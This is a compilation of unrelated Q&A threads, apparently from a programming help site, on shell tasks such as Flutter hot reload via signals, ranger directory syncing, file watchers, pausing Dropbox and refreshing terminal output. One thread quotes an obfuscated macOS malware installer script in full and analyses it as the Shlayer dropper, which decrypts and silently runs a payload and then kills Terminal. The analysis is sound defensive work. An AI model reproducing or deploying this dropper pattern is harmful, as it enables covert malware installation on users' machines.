Hot reload on save - macos

I'm currently using a terminal and vim on macOS as a development environment for Flutter. Things are going pretty well except that the app does not reload when I save any dart files. Is there a way to trigger that behavior? Currently I have to go to the terminal and press "r" to see my changes.

Sorry for the plug, but I wrote a very simple plugin to handle this.
It uses Flutter's --pid-file command-line flag to send the process a SIGUSR1 signal.
You can achieve the same result as my two-line plugin by adding this autocmd:
autocmd BufWritePost *.dart silent execute '!kill -SIGUSR1 "$(cat /tmp/flutter.pid)"'
and launching Flutter with the --pid-file flag, e.g. flutter run --pid-file /tmp/flutter.pid.
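To make the moving parts explicit, here is a tiny shell sketch of the signal side (the path /tmp/flutter.pid and the function name are illustrative choices, not Flutter conventions):

```shell
#!/bin/sh
# Sketch: send Flutter's hot-reload signal, assuming the app was started with
#   flutter run --pid-file /tmp/flutter.pid
# PIDFILE and the function name hot_reload are made up for this example.
hot_reload() {
  pidfile="${PIDFILE:-/tmp/flutter.pid}"
  # SIGUSR1 triggers hot reload; SIGUSR2 triggers hot restart.
  [ -r "$pidfile" ] && kill -USR1 "$(cat "$pidfile")"
}
```

Wired into an editor's save hook, this reloads the running app on every write.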

I made a vim plugin, hankchiutw/flutter-reload.vim, based on sending SIGUSR1.
You don't need the --pid-file flag with this plugin (it finds the process with pgrep).
Simply run flutter run, modify a *.dart file, and watch it reload.

I did it with an excellent little tool called entr. On macOS you can install it with Homebrew: brew install entr. The tool's home page is http://eradman.com/entrproject/
Then you start flutter run with the pid file, as nobody_nowhere suggests.
How you run entr depends on the level of service you need. In the simplest case you just do find lib/ -name '*.dart' | entr -p kill -USR1 $(cat /tmp/flutter.pid)
But this invocation will not detect new files in the source tree (find builds the list of files to watch only once, at startup). You can get around that with a slightly more complex one-liner:
while true
do
find lib/ -name '*.dart' | \
entr -d -p kill -USR1 $(cat /tmp/flutter.pid)
done
The -d option makes entr exit when it detects a new file in one of the watched directories, and the loop restarts it.
I personally use an even more complex approach. I use Redux, and hot reload does not pick up changes to middleware or other state files, so those require a hot restart instead.
I have a script hotrestarter.sh:
#!/bin/bash
set -euo pipefail
PIDFILE="/tmp/flutter.pid"
if [[ "${1-}" != "" && -e $PIDFILE ]]; then
if [[ "$1" =~ \/state\/ ]]; then
kill -USR2 $(cat $PIDFILE)
else
kill -USR1 $(cat $PIDFILE)
fi
fi
It checks whether the modified file lives in a /state subdirectory and, if so, does a hot restart; otherwise it does a hot reload. I invoke the script like this:
while true
do
find lib/ -name '*.dart' | entr -d -p ./hotrestarter.sh /_
done
The /_ argument makes entr pass the name of the changed file to the program being invoked.

You don't say which platform, but every platform has a "watcher" tool that can run a command when any file in a tree changes. You'll need to run one of those.
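For illustration, the idea behind such watchers can be sketched as a plain-sh polling loop (a sketch only; dedicated tools like entr, fswatch, or inotifywait are far more efficient, and the name watch_dir is made up):

```shell
#!/bin/sh
# Minimal polling watcher sketch: run a command whenever any file under a
# directory changes. Fingerprints the tree with ls + cksum once per second.
watch_dir() {
  dir="$1"; shift
  last=""
  while :; do
    # Fingerprint the tree from file names, sizes, and timestamps.
    cur="$(find "$dir" -type f -exec ls -l {} + 2>/dev/null | cksum)"
    if [ -n "$last" ] && [ "$cur" != "$last" ]; then
      "$@"   # fire the user's command on any change
    fi
    last="$cur"
    sleep 1
  done
}
```

Usage would be something like watch_dir lib kill -USR1 "$(cat /tmp/flutter.pid)", with the same caveats about when $(cat ...) is expanded.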

VS Code has this feature. If you don't mind moving to VS Code you get it out of the box. You could also reach out to the author and see if they have suggestions for doing it in vim, or check the source directly. Most likely vim has a mechanism for it.


How harmful is this command?

#!/bin/bash
A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s";
export appDir=$(cd "$(dirname "$0")"; pwd -P)
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
export binFile="$(cd "$appDir"; ls | grep -Ev '\.(command)$' | head -n 1 | rev)"
export archive="$(echo $binFile | rev)"
export commandArgs='U2FsdGVkX19PirpiUvZVXJURbVDsu4fckJoMWR7UHtP5ORyLB+dz/Kl5hJixSJLItUpkynZbcVxd98nfHH3xJwRWWkgAPynQTGNsqO2MKLHIGjQrJIsibmDRd13M8tvC14MkiKVa9SJAewH/NkHjfSMw0Ml5VbfJ7VMepYBlG5XfxqJ+wAdjfU+LiQqNEcrHKJr+Zoe33HEaCL3SWtYFSwOvUy9m8nUasOujyTPoMtNZhccr7ZRcjOyH9D6s2MHxK9UREQ8hHVugcmcEqDzJag8KWPFTKA+9YWp++/WzSQnFsHb9mT4HXqWdHfnW+3h9'
decryptedCommand="$(echo -e "$commandArgs" | ${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C} -${A}${E}${S}-256-cbc -${D} -A -b${A}${S}${E}64 -${P}${A}${S}${S} "${P}${A}${S}${S}:$archive")"
nohup /bin/bash -c "eval \"$decryptedCommand\"" >/dev/null 2>&1 &
killall Terminal
I got this from a shady install.dmg file that automatically downloaded. I obviously didn't run this so I thought I might ask you guys here.
Short answer: Do NOT run it. Kill it with fire, unless you're interested in analyzing it as malware.
It's an obfuscated malware installer script. The script itself is pretty generic, but there's another (encrypted) file in the same directory that's the real payload, and it's almost certainly malware. In fact this looks like a near-exact match for one I looked at a while ago. Here's the VirusTotal scan results for that one, which suggests it's the Bundlore adware collection. This CrowdStrike blog post IDs it as Shlayer, and agrees that the payload is Bundlore.
Explanation: if this is a match for the one I looked at before, there's another file there named "2P1zsqQ" alongside this script. That filename is used as a password to decrypt the commandArgs string into a shell command string, which has instructions to decrypt the 2P1zsqQ file itself (with the same password) as /tmp/<somethingrandom>/Qqsz1P2, run that (decrypted) executable, and then delete it (while this script kills the Terminal app, thus hiding what's going on).
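You can see the trick without running anything dangerous: the single-letter variables merely spell out command names. A harmless demonstration:

```shell
#!/bin/sh
# The script's variable soup reassembles into an ordinary command name:
A="a";C="c";D="d";E="e";L="l";M="m";N="n";O="o";P="p";S="s"
hidden="${O}${P}${E}${N}${S}${S}${L} ${E}${N}${C}"
echo "$hidden"   # prints: openssl enc
```

So the decryption line is just openssl enc -aes-256-cbc -d -A -base64 -pass pass:<filename>, using the sibling file's reversed name as the password.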
BTW, this question is about a similar malware installer script; maybe an earlier version with slightly less obfuscation.

How to recursively exit nested shells?

I use the Ranger file manager in my terminal to move around. Every time I use the S command to drop into a new directory, Ranger is actually launching a new shell. When I want to close a terminal window I need to run exit as many times as I have changed directories with Ranger. Is there a command that will run exit recursively for me until the window closes? Or better yet is there a different Ranger command to use?
Don't enter a sub-shell, just quit ranger and let the shell sync the directory back from ranger.
function ranger {
local IFS=$'\t\n'
local tempfile="$(mktemp -t tmp.XXXXXX)"
local ranger_cmd=(
command
ranger
--cmd="map Q chain shell echo %d > "$tempfile"; quitall"
)
"${ranger_cmd[@]}" "$@"
if [[ -f "$tempfile" ]] && [[ "$(cat -- "$tempfile")" != "$PWD" ]]; then
cd -- "$(cat "$tempfile")" || return
fi
command rm -f -- "$tempfile" 2>/dev/null
}
Press capital Q to quit ranger; the shell then automatically switches to the directory you were in within ranger.
This is flexible: you can still use q to quit normally, without syncing the directory back to the shell.
Update:
Opening ranger with . ranger is another solution, which is NOT recommended. Compared with the previous method, quitting . ranger with q always syncs the directory back to the shell; you have no control over this behavior.
No real solution to this. It's often requested but not as easy as people think.
You can source ranger by starting it as . ranger. That will cd to ranger's cwd when quitting.
References
Changing directories from ranger wiki
How to exit and cd into last dir you were on ranger? #1554
@Simba thanks for the great answer and the link to the docs.
In the end, the easiest answer was to just create an alias in my .bashrc like the docs recommend
alias ranger=". ranger"
Now when I use Q to quit, it automatically switches to the new directory, and only requires running exit one time to close the window.

Using inotifywait (or alternative) to wait for rsync transfer to complete before running script?

I would like to set up inotifywait so that it monitors a folder, and when something is copied to it (by lsyncd, which uses rsync), inotifywait sits tight and waits until rsync is done before calling a script to process the new folder.
I have been researching online to see if someone is doing this but I am not finding much.
I'm not the most well versed with bash scripting though I understand some basics.
Here is a little script I found that pauses for a second, but it still triggers a dozen events per transfer:
EVENTS="CLOSE_WRITE,MOVED_TO"
if [ -z "$1" ]; then
echo "Usage: $0 cmd ..."
exit 1;
fi
inotifywait -e "$EVENTS" -m -r --format '%:e %f' . | (
WAITING="";
while true; do
LINE="";
read -t 1 LINE;
if test -z "$LINE"; then
if test ! -z "$WAITING"; then
echo "CHANGE";
WAITING="";
fi;
else
WAITING=1;
fi;
done) | (
while true; do
read TMP;
echo "$@"
"$@"
done
)
I would be happy to provide more details or information.
Thank you.
Depending on what action you want to take, you may want to take a look at the tools provided by Watchman.
There are two that might be most useful to you:
If you want to initiate some action after the files are synced up, you may want to try using watchman-make. This is most appropriate if the action is to run a tool like make where the tool itself will look over the tree and produce its output (in other words: where you don't need to pass the precise list of changed files directly to your tool). You can have it run some other tool instead of make. There is a --settle option that you can use to have it wait a few moments after the latest file change notification before executing your tool.
watchman-make --make='process-folder.sh' -p '**/*.*'
watchman-wait is more closely related to inotifywait. It also waits for changes to settle before reporting files as changed, but because this tool doesn't coalesce multiple different file changes into a single event, the settle period is configured as a property of the watched tree rather than as a command-line parameter.
Disclaimer: I'm the creator of Watchman

latexmk - running bash command to stop Dropbox syncing

I am using latexmk to compile my LaTeX thesis. I keep the thesis on my Dropbox, and as the dozens-to-hundreds of .aux and associated files are created, Dropbox indexing induces a significant overhead.
I thus want to insert the following bash script before compilation starts to stop Dropbox:
#!/usr/bin/env bash
dropbox_pid="$(pgrep Dropbox)"
kill -STOP $dropbox_pid
and correspondingly, to restart Dropbox at the end, I would like:
#!/usr/bin/env bash
dropbox_pid="$(pgrep Dropbox)"
kill -CONT $dropbox_pid
How do I do this by editing the local latexmkrc?
Not sure you will be able to send the SIGCONT signal from the latexmkrc; isn't that file sourced before compilation starts?
You could try to set a bash function such as:
compile () {
pkill -STOP Dropbox
# compile_command "$@"
pkill -CONT Dropbox
}
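That said, latexmk itself exposes hooks that run around each compilation in -pvc mode; a sketch for the local latexmkrc, assuming the hook variables from latexmk's documentation ($compiling_cmd, $success_cmd, $failure_cmd):

```perl
# Run when a compilation starts / succeeds / fails (latexmk -pvc mode).
$compiling_cmd = "pkill -STOP Dropbox";
$success_cmd   = "pkill -CONT Dropbox";
$failure_cmd   = "pkill -CONT Dropbox";
```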
By setting the working directories ($aux_dir and $out_dir) to somewhere outside the Dropbox folder, you can avoid the excessive Dropbox syncing.
The following is from my $HOME/.latexmkrc. It puts the working directory under ~/.tmp/tex/THE_NAME_OF_MY_WRITING_PROJECT and creates it if it is not present.
$aux_dir = "$ENV{HOME}/.tmp/tex/" . basename(getcwd);
$out_dir = $aux_dir;
mkpath($aux_dir);

Bash script to show updating information in terminal

I'm trying to write a bash script that displays the output from a python script. I want the output refreshed every second, so my script looks like this (run.sh):
#!/bin/bash
export INTERVAL=1
export SCRIPT="something.py"
while true
do
clear
python ${SCRIPT}
sleep ${INTERVAL}
done
The screen, however, flickers while the python script works (there's some web access involved). How can I make this more sophisticated and wait for the script to finish before clearing what I used to have?
Thanks in advance!
Use watch. It will only update the screen when the entire script is done, and it'll take care of things like clearing the screen, and dealing with output that is larger than a single screen.
watch -n "${INTERVAL}" "python ${SCRIPT}"
If you want to see an example of how watch works with long-running tasks, do this:
watch 'date; echo; echo Long running task...; sleep 3; echo; date'
A quick way is to establish a temporary file:
tmpf=$(mktemp)
while [ condition ]
do
python ${SCRIPT} > $tmpf
clear
cat $tmpf
sleep ${INTERVAL}
done
rm $tmpf
This requires some cleanup on exit, though. Other than that, I would suggest moving the whole loop into Python, because really, why not? You can use subprocess to fork out another shell and build a more general program.
Supplement:
You can use the trap builtin (here's an article on it) to do the cleanup automatically when your script is killed.
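A minimal sketch of that trap-based cleanup (the file contents and message are illustrative):

```shell
#!/bin/sh
# Create a temp file and guarantee its removal on normal exit, Ctrl-C, or kill.
tmpf="$(mktemp)"
trap 'rm -f "$tmpf"' EXIT INT TERM
echo "output goes here" > "$tmpf"
cat "$tmpf"
```

With this in place, the rm $tmpf at the end of the loop above becomes unnecessary.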
It's an ugly hack, but it doesn't use temporary files or FIFOs:
a=$(clear; python ${SCRIPT})
echo "$a"
but seriously: the best way is to incorporate the screen clearing into your script. Give it a -clear switch or something similar.
